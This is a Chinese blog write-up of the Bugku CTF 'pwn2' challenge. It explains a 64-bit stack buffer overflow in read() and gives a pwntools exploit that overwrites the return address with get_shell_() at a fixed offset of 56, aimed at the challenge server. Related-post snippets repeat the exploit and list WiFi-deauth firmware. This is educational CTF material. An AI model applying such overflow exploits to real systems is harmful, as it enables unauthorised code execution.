bugku-pwn2-wp

最新推荐文章于 2021-08-31 15:02:34 发布
最新推荐文章于 2021-08-31 15:02:34 发布
阅读量342 收藏
点赞数 1
分类专栏: pwn学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45427676/article/details/105328308
版权

下载完题后先在VM中checksec查看保护机制
在这里插入图片描述
基本没有开什么保护,可以知道文件是64位的,用64位IDA打开,按F5键反汇编一下,看一下main函数
在这里插入图片描述

可以发现read()函数存在栈溢出漏洞,缓冲区s的大小为0x30,而read()函数指向缓冲区中读入0x100大小的数据,所以造成栈溢出。
在main函数下面有一个get_shell_()函数,打开看一下
在这里插入图片描述
有一个system(“cat flag”),cat flag是得到flag的指令,所以只要执行了get_shell_()函数,就能得到flag。利用栈溢出,控制跳转,跳转到get_shell_()函数的地址执行get_shell_()函数,即利用read()函数将get_shell_()函数的地址写在s处,执行get_shell_()函数.
使用gdb调试程序,查看栈的情况
在这里插入图片描述
在read函数那下个断点,然后跟进去,由于这是个64位的程序,所以read函数的三个参数依次保存在rdi、rsi、rdx、rcx、r8、r9中。所以rdi为0,rsi为buffer的地址,rdx为0x100.
RBP—RSI为缓冲区大小(0x30),将0x30转为十进制
在这里插入图片描述
所以偏移地址为RBP-RSI+8=48+8=56,加8是因为64位程序下的rbp占8个字节所以加8
找到get_shell_()函数地址为
在这里插入图片描述
脚本如下:

from pwn import *

context.log_level = 'debug'

# conn = process('./pwn2')
conn = remote('114.116.54.89',10003)

shell_addr = 0x0000000000400751

conn.recvuntil('say something?')

payload = 'A' * 56 + p64(shell_addr)

conn.sendline(payload)

conn.interactive()

执行脚本得到flag
在这里插入图片描述

参考文章
参考文章

夜行猫
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku CTF MISC(持续更新~~)
m0_50043719的博客
07-17 197
签到题 flag{BugKu-Sec-pwn!} 社工-进阶收集
BugKu - pwn2
Casuall的博客
07-06 3668
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
bugku pwn2学习心得以及wp
欢迎来到神林的博客
08-25 600
拿到题目: file查看一下文件类型,可以看到 x86-64,以及 dynamically linked,所以 64位,动态连接的。 查看一下有没有开什么保护机制: 嘛都没开,直接放到64位IDA里面看一看。 看到敏感名称函数“getshell” 感觉能直接拿flag,方法就是找到一个地方跳转到getshell函数地址,查看一下地址为:0x400715 转手看main函数: 其中有一个re...
[pwn]bugku pwn2
qq_18823653的博客
03-26 5466
首先检查了一下保护机制,发现几乎啥保护都没有,ida查看一下 read()函数存在溢出,然后又看了一下发现main函数下面有一个get_shell_函数,点进去看了看应该是让返回地址覆盖成getshell地址, gdb看一下偏移rbp前四位为bAA1,算一下偏移 到rbp偏移为48,向上8字节是父函数rbp,所以偏移56覆盖到返回地址,get_shell_地址为 exp如下: from pwn ...
[WP]BugkuCtf - pwn2
XiaoYan8023的博客
04-27 326
1.首先运行一下该程序 2.我们权限不够于是去修改一下权限(改前,改后) (当然,这步有可能是不需要的) 3.改后我们重新运行一下(123是输入的语句) 4.拖进IDA,查看字符串,此处应该就是得到flag的地方 5.之后我们查看main函数,并没有我们刚才所看见的那句话 6.而在get_shell函数中我...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
bugku的杂项writeup(一)
weixin_43342135的博客
08-12 436
1.签到题: 关注公众号Bugku得到flag: flag{BugKu-Sec-pwn!} 2.这是一张单纯的图片 拿到这张图片后,用winhex打开,发现文件的末尾多出异常的字符: 拿去unicode解码后得到flag: 3.隐写 下载文件之后,用winhex打开查看文件是否存在隐藏文件,结果发现没有隐藏文件只有一张图片。 解压图片后,用winhex打开,发现了图片的长宽高并不一样,将A...
bugku 杂项 签到题
S123KO的博客
10-26 413
这个题算是很简单,没有难度的了,点开题之后会有一个二维码,微信扫描二维码关注bugku微信公众号就有答案了。 题目答案:flag{BugKu-Sec-pwn!}
Writeup bugku刷题 pwn2
Migraine‘s Blog
05-13 2340
概述:bugku新出的pwn题,练一练手 关键字:栈溢出 x64 网址:https://ctf.bugku.com/challenges 分析一下代码,发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...
BugkuCTF练习平台pwn3(read_note)的writeup
只影的博客
03-05 1455
Bugku的pwn题中,这道题分值最高,也是难度最大的一道。难点在于,第一要读懂题目找出漏洞,第二是要绕过各种保护机制,第三是exp的编写调试。看一眼程序的保护机制,发现除了RELRO所有保护全开,还是有点头疼的,毕竟我刚开始学pwn没几天,还没有做过PIE和Canary的题目,所以调试还是花了不少时间的。 首先分析程序,重要部分如下所示。一开始会让你输入一个路径,不存在的话就会报错推出,然后打...
BugkuCtf-pwn2-exp
weixin_30340745的博客
08-22 377
#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...
BugkuCTF-PWN题pwn7-repeater详细讲解多解法
am_03的博客
08-31 4065
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
bugku pwn4 学习
欢迎来到神林的博客
08-27 1171
2019-08-25 bugku pwn4 学习 1.拿到题目先file 一下文件看看文件属性 查看得知是64位动态链接库的文件。2.checksec 查看是否开启什么保护然而并没有什么保护PIE 保护指定是对代码段进行保护3.IDA查看内容 看到了敏感函数system,看着想办法跳转4.查看main函数,有栈溢出的敏感函数 read 想办法利用read 函数5.查看read函数栈中内容 完全能够...
BUGKU------flag被盗
Y4tacker的博客
07-27 7225
使用wireshark,搜索字符串即可,很简单
bugku ctf 这是一张单纯的图片(FLAG在哪里??)
qq_42777804的博客
05-17 5539
打开之后发现是一张图片 (挺可爱的哈哈) 把他下载到电脑上吧 查看他的属性哈哈哈 有时候可能会出现在这里 但是 这道题没有 但是之前那道题可是有的啊 用我的老工具winhex打开吧 在最后发现了 Unicode编码 key{yo&amp...
mqtt-pwn安装
最新发布
09-20
2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt-pwn容器:使用命令`sudo docker-compose up --build --detach`启动mqtt-pwn容器。 另外,您还需要安装以下软件: 1. 安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值